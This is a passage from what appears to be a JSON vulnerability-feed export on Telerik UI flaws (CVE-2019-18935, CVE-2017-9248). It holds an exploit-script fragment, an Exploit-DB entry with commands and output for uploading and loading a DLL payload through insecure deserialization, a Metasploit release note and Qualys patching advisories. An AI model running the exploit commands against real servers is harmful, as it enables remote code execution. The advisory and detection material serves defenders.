Ltd\\nCVE-2017-9248 - \" +\r\n \"Telerik.Web.UI.dll Cryptographic compromise\\n\\n\"\r\n )\r\n\r\nif len(sys.argv) < 2:\r\n mode_help()\r\n\r\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 4:\r\n mode_decrypt()\r\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 4:\r\n mode_encrypt()\r\nelif sys.argv[1] == \"-k\" and len(sys.argv) == 6:\r\n mode_brutekey()\r\nelif sys.argv[1] == \"-s\" and len(sys.argv) == 2:\r\n mode_samples()\r\nelif sys.argv[1] == \"-b\" and len(sys.argv) == 3:\r\n mode_b64e()\r\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 3:\r\n mode_b64d()\r\nelse:\r\n mode_help()", "sourceHref": "https://www.exploit-db.com/download/43873", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:08:08", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-18935", "CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "sourceHref": "https://www.exploit-db.com/download/47793", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/metasploit-blg-3-copy.png)\n\nMetasploit keeping that developer awareness rate up.\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/telerik-fake-text-2.png)\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * ![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.32.04-AM-1-1070x479.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.43.47-AM-1-1070x535.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-1.41.35-PM-1070x828.png)\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/2020-10-22_12-45-21-1070x2407.png)\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-VMDR-1070x494.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-prioritization-1070x388.png)\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/rtaImage-1070x1838.png)\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}